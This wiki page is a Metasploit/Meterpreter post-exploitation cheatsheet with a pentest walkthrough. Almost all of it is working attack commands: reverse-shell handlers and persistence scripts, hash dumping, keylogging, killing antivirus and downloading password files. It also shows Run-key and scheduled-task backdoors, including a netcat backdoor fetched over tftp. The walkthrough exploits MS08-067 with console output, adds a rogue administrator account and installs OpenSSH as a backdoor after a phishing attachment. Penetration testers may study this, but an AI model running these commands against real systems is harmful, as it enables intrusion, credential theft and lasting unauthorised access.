From Network Security Wiki
Jump to navigation Jump to search



1. Pick which exploit to use        
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

Common Commands

show expolit windows
use iis50_webdav_ntdll
show options
set RHOST <IP address>
set RPORT 80
show targets
show payloads
set PAYLOAD win32_reverse
show options
set LHOST <your IP address
show advanced

Complete Cheatsheet

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r -p 21 -A -X -i 30
exploit -j -z


rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf
db_driver sqlite3
db_create pentest11
setg LHOST
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r -p 21 -A -X -i 30

shows all the scripts

run [tab]

persistence! broken ...if you use DNS name ..

run persistence -r -p 21 -A -X -i 30
run get_pidgin_creds

SYSTEM SHELL ( pick a proc that is run by system )

migrate 376

session hijack tokens

use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

escalate to system

use priv
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

list top used apps

run prefetchtool -x 20

list installed apps

run prefetchtool -p
run get_local_subnets

find and download files

run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office


download -r "%USERPROFILE%\\desktop"  ~/
download -r "%USERPROFILE%\\my documents"  ~/

alternate to shell not SYSTEM

execute -f cmd.exe -H -c -i -t

does some run wmic commands etc

run winenum

rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"

An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

vnc / port fwd for linux

run vnc

priv esc

run kitrap0d
run getgui

somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav
run winemun

run memdump
run screen_unlock
 upload /tmp/system32.exe C:\\windows\\system32\\
 reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
 reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
 reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
 reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
 upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
migrate 520
portfwd add -L -l 6666 -r -p 80"
portfwd add -L -l -r -p 6666
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
run msf_bind
run msf_bind -p 1975
run deploymsf -f framework-3.3-dev.exe
run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d
run netenum -rl -r
run netenum -st -d
run netenum -ps -r

Windows Login Brute Force Meterpreter Script

run winbf -h

upload a script or executable and run it


Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe"  /ED 11/11/2011

kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks

catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe" dummy
  • Nessus Scanning through a Metasploit Meterpreter Session

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network?

The Players:


Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L -l 8000 -r -p 22

This command sets up a listener on port 8000 of the attacker's IP ( and forwards packets to port 22 on the victim's machine (

Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

ssh -D -p 8000 username@

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

Preparing for a custom command line OpenSSH Installation in your lab

The basic steps to prepare a command line OpenSSH installation for Windows are as follows:

1. Download the setupssh.exe installation package from

2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH

3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.

4. Export the following registry keys using the REG EXPORT command as follows:

REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG
REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG

5. Concatenate all of these registry files together into one file.


6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.

Performing an installation via command shell

Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of, and that our target is a Windows 2003 SP0 machine with IP address of Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.

Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit ( with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.

Exploiting the Vulnerability

[root@localhost framework-3.2]# nc -v 445
Connection to 445 port [tcp/microsoft-ds] succeeded!
[root@localhost framework-3.2]# ./msfconsole
msf > search exploits ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...
Name Description
---- -----------
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST
msf exploit(ms08_067_netapi) > set TARGET 5
msf exploit(ms08_067_netapi) > show options
... truncated output ...
Exploit target:
Id Name
-- ----
5 Windows 2003 SP0 Universal
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->
meterpreter > sysinfo
OS : Windows .NET Server (Build 3790, ).

Uploading your OpenSSH Files

meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
meterpreter > lpwd
meterpreter > cd \
meterpreter > cd "Program Files"
meterpreter > mkdir openssh
Creating directory: openssh
meterpreter > cd openssh
meterpreter > pwd
C:\Program Files\openssh
meterpreter > upload -r . .
[*] uploading : ./uninstall.exe -> .\uninstall.exe
[*] uploaded : ./uninstall.exe -> .\uninstall.exe
[*] mirroring : ./bin -> .\bin
[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploading : ./bin/chown.exe -> .\bin\chown.exe
[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe
[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
.... lots of output truncated ....
meterpreter > execute -f cmd.exe .i
Process 848 created.
Channel 66 created.

Modifying the Registry and Adding Your Own Username

Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\openssh>whoami
nt authority\system
C:\Program Files\openssh>reg import openssh.reg
reg import openssh.reg
The operation completed successfully.
C:\Program Files\openssh>net user inet_p0wned gameover /add
net user inet_p0wned gameover /add
The command completed successfully.
C:\Program Files\openssh>net localgroup administrators inet_p0wned /add
net localgroup administrators inet_p0wned /add
The command completed successfully.
C:\Program Files\openssh>cd etc
cd etc
C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd
..\bin\mkpasswd -l >passwd
C:\Program Files\openssh\etc>..\bin\mkgroup -l >group
..\bin\mkgroup -l >group
C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
[SC] CreateService SUCCESS

Start the OpenSSH Service

C:\Program Files\openssh\etc>sc start opensshd
sc start opensshd
SERVICE_NAME: opensshd
WIN32_EXIT_CODE : 0 (0x0)
WAIT_HINT : 0x7d0
PID : 1916
C:\Program Files\openssh\etc>sc query opensshd
sc query opensshd
SERVICE_NAME: opensshd
WIN32_EXIT_CODE : 0 (0x0)
 C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=

The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=**

Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.
C:\Program Files\openssh\etc>exit
meterpreter > quit
[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > quit

Now, lets go ahead and SSH into our Windows server to check if things worked!

root@localhost:~/framework-3.2]# ssh inet_p0wned@
The authenticity of host ' (' can't be established.
RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
OpenSSH for Windows. Welcome aboard!
inet_p0wned@'s password:
Could not chdir to home directory /home/inet_p0wned: No such file or directory
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\OpenSSH>
C:\Program Files\OpenSSH>whoami
C:\Program Files\OpenSSH>exit
Connection to closed.
[root@localhost framework-3.2]#
  • Cleaning up:

To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.

C:\> SC STOP opensshd
C:\> SC DELETE opensshd
C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va
C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va
C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va
C:\> CD "\Program Files"
C:\Program Files> RMDIR /Q /S opensshd
C:\Program Files> NET USER inet_p0wned /DELETE

blog comments powered by Disqus